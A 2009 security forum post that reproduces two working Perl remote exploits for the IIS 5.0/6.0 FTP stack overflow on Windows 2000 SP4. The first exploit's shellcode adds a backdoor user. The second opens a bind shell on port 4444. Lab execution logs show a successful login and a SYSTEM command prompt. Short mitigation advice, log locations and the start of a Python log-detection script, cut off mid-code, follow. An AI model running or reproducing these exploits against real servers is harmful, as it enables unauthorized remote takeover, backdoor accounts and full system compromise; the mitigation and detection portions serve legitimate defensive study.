Author Topic: Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)  (Read 14,382 times)
berz3k
Moderador
Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4)
« on: 2 September 2009, 12:37 »

As we all know, the news of this new vulnerability is wreaking havoc on some networks. I tested it in my small lab as a Proof of Concept; write privileges are strictly required:

Exploit 1: This first version only adds a user (user: winown, pass: nwoniw) from inside the shellcode.

Code:
#!/usr/bin/perl
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Execution:
Code:
C:\>perl -x exploit1.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t20560" directory created.
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.


Afterwards we can check whether we succeeded from within the FTP service itself

Code:
C:\>ftp 192.168.1.68
Conectado a 192.168.1.68.
220 win2k-pro Microsoft FTP Service (Version 5.0).
Usuario (192.168.1.68:(none)): winown
331 Password required for winown.
Contraseña: nwoniw
230 User winown logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
w00t20560
226 Transfer complete.
ftp: 11 bytes recibidos en 0.00 segundos 3.67 a Kbytes/s.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
08-31-09  07:41PM       <DIR>          w00t20560
226 Transfer complete.
ftp: 50 bytes recibidos en 0.00 segundos 50000.00 a Kbytes/s.
ftp>

The admin will notice a newly created user with privileges:




Exploit 2: This second, "improved" exploit defines a bind shell on port 4444 inside the shellcode

Code:
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Execution:
Code:
C:\>perl -x exploit2.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t26878" directory created.
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

C:\>nc -vvn 192.168.1.68 4444

(UNKNOWN) [192.168.1.68] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Brilliant!


Links of interest:

Exploits:
:http://www.milw0rm.com/exploits/9541
:http://www.milw0rm.com/exploits/9559

Video demo by offensive-security
:http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

Best practices for MS FTP
:http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b4bdad5-9a0a-4bf6-8b00-41084b783e20.mspx?mfr=true

+FIX
- There are few mitigating factors; it really comes down to denying write access to "anonymous" users
- Turn off the FTP service if it is not needed
- Create ACLs for users and directories.



+Examine the LOG files

Usually found at this path:
Code:
c:\winnt\system32\logfiles\MSFTPSVC1

The logs would look like this:

Code:
Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1111-01-01 22:45:13
#Fields: time c-ip cs-method cs-uri-stem sc-status
22:45:13 169.254.117.152 [1]USER anonymous 331
22:45:13 169.254.117.152 [1]PASS password 230
22:45:13 169.254.117.152 [1]MKD JUNK@C~~~~~~~~~~~~~~~~~~~~


Have fun!

-berz3k.

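As an added example (not the post's or the exploit authors' code), a Python checker for the MSFTPSVC W3C log format quoted in the post: it reads the column names from the `#Fields:` header and flags anonymous write, oversized or binary command arguments and the `*/../` NLST wildcard pattern. The sample log lines, the thresholds and the rule names are constructed for this example and are assumptions, not real captures.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

LONG_ARG = 200            # FTP arguments are normally a short path; the PoC sends ~500 bytes
WATCHED = {"USER", "PASS", "MKD", "CWD", "SITE", "NLST"}
NONPRINT = re.compile(r"[^\x20-\x7e]")       # raw shellcode bytes inside an argument
NLST_TRAVERSAL = re.compile(r"\*/\.\./")     # the NLST wildcard pattern seen in the post
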